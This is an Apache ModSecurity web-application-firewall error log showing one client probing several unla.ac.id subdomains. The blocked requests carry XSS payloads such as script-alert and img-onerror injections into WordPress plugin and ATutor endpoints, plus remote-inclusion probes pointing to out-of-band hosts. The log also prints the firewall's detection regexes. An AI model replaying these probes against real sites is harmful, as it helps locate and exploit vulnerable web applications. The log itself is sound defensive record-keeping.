[Tue Aug 29 11:53:12.608740 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoZ6TYAAAAK"]
[Tue Aug 29 11:53:12.616442 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAni-CEAAAAU"]
[Tue Aug 29 11:53:12.686706 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAog@CwAAAAY"]
[Tue Aug 29 11:53:12.690522 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAoW7NgAAAAJ"]
[Tue Aug 29 11:53:12.713403 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAouCzMAAAAo"]
[Tue Aug 29 11:53:13.730778 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15ucCo-f0AAAog@C4AAAAY"]
[Tue Aug 29 11:53:13.962236 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15ucCo-f0AAAor7p8AAAAk"]
[Tue Aug 29 11:53:14.360333 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15usCo-f0AAAolKUUAAAAe"]
[Tue Aug 29 11:53:14.468712 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAnTlacAAAAA"]
[Tue Aug 29 11:53:14.476119 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAoLfQ8AAAAG"]
[Tue Aug 29 11:53:14.486694 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAoZ6TwAAAAK"]
[Tue Aug 29 11:53:14.489137 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAot8NIAAAAn"]
[Tue Aug 29 11:53:14.526377 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAoocxQAAAAh"]
[Tue Aug 29 11:53:14.596959 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAoT7VEAAAAD"]
[Tue Aug 29 11:53:14.599872 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAnTlaoAAAAA"]
[Tue Aug 29 11:53:14.601380 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAojapMAAAAb"]
[Tue Aug 29 11:53:14.602958 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAog@DEAAAAY"]
[Tue Aug 29 11:53:14.692120 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAoLfREAAAAG"]
[Tue Aug 29 11:53:14.862885 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAojapYAAAAb"]
[Tue Aug 29 11:53:15.534905 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAog@DYAAAAY"]
[Tue Aug 29 11:53:15.761668 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAnTla8AAAAA"]
[Tue Aug 29 11:53:15.771910 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAog@DcAAAAY"]
[Tue Aug 29 11:53:15.772900 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15u8Co-f0AAAoW7OEAAAAJ"]
[Tue Aug 29 11:53:15.809743 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAnd3Q8AAAAI"]
[Tue Aug 29 11:53:16.028927 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAoT7VkAAAAD"]
[Tue Aug 29 11:53:16.543970 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoXJvUAAAAP"]
[Tue Aug 29 11:53:16.544907 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoW7OQAAAAJ"]
[Tue Aug 29 11:53:16.544994 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAnTlbQAAAAA"]
[Tue Aug 29 11:53:16.555397 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAni-CkAAAAU"]
[Tue Aug 29 11:53:16.565151 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoXJvYAAAAP"]
[Tue Aug 29 11:53:16.612868 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoW7OYAAAAJ"]
[Tue Aug 29 11:53:16.613606 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15vMCo-f0AAAolKU8AAAAe"]
[Tue Aug 29 11:53:17.643902 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoesM0AAAAV"]
[Tue Aug 29 11:53:17.658174 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAosCwEAAAAm"]
[Tue Aug 29 11:53:17.791414 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoqbQoAAAAj"]
[Tue Aug 29 11:53:17.850946 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoW7OoAAAAJ"]
